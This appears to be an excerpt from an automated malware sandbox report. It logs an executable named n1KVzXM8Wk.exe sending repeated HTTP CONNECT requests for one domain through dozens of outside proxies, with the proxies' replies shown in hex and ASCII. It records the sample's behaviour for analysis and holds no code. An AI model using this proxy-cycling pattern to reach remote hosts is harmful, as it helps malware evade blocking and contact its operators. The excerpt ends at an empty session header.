                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      692192.168.2.452254104.16.106.234806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.713633060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.801222086 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      693192.168.2.4521488.213.128.9080896812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.721736908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.023554087 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      694192.168.2.452235172.245.16.47156736812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.723391056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      695192.168.2.452125103.119.55.21680806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.723911047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.019804001 CET19INHTTP/1.1 200 OK
                                                                                                      Feb 23, 2024 09:45:23.019968987 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      696192.168.2.452268188.114.99.37806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.729721069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.819134951 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      697192.168.2.452139106.51.62.10680806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.729727983 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.816668987 CET220INHTTP/1.0 403 Banned site: Content-Type: text/html<HTML><HEAD><TITLE>DansGuardian - Banned site: </TITLE></HEAD><BODY><H1>DansGuardian - Banned site: </H1>https://heygirlisheeverythingyouwantedinaman.com</BODY></HTML>
                                                                                                      Data Raw:
                                                                                                      Data Ascii:


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      698192.168.2.451305159.65.217.19280006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.729815960 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.823661089 CET19INHTTP/1.0 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      699192.168.2.451716184.170.245.14841456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.741082907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      700192.168.2.452276104.20.75.132806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.741792917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.831955910 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      701192.168.2.45216258.234.116.197806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.742058039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      702192.168.2.45212939.105.27.3031286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.742208958 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Feb 23, 2024 09:45:22.114006996 CET38INHTTP/1.1 200 OK
                                                                                                      content-length: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      703192.168.2.45228745.196.150.4654326812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.758639097 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.853363991 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                                                      Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Content-Length: 65
                                                                                                      Proxy-Authenticate: Basic realm="Proxy"
                                                                                                      Connection: close
                                                                                                      Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                                                      Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      704192.168.2.45222751.210.223.930006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.758933067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      705192.168.2.452319172.67.181.37806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.761950016 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.849504948 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      706192.168.2.452218142.54.229.24941456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.766174078 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      707192.168.2.452248148.72.23.56361116812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.766206980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.366048098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.866153002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      708192.168.2.452289172.245.159.177806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.766273975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.869168043 CET323INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.9.9
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 172
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 39 2e 39 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.9.9</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      709192.168.2.452231162.240.76.92806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.775170088 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.334464073 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.893872023 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.122097969 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.444032907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      710192.168.2.45147292.204.135.37338996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.785296917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.865714073 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.866378069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.866118908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      711192.168.2.452252162.214.165.6426246812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.815413952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      712192.168.2.451558154.12.253.23227636812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.817095041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.865715981 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.866396904 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.866075993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      713192.168.2.452166103.169.128.15280806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.817517996 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.355807066 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      714192.168.2.45222145.11.95.16550006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.817730904 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.334485054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.832041979 CET39INHTTP/1.0 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      715192.168.2.451463162.241.46.40625926812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.819457054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.865755081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.866378069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.866074085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      716192.168.2.452207151.232.18.6656786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.819474936 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      717192.168.2.452261213.133.123.12232186812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.819598913 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.334465027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.893665075 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.440077066 CET39INHTTP/1.0 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      718192.168.2.452284170.106.193.128300016812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.819641113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      719192.168.2.452274160.153.245.187428796812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.840043068 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      720192.168.2.452279194.34.232.107806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.844374895 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.013793945 CET467INHTTP/1.1 403 Forbidden
                                                                                                      Date: Fri, 23 Feb 2024 08:45:21 GMT
                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                      Content-Length: 306
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      721192.168.2.452286141.94.174.6240856812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.846023083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.334470034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      722192.168.2.45158272.206.181.10341456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:21.856425047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      723192.168.2.452343139.180.39.21080806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
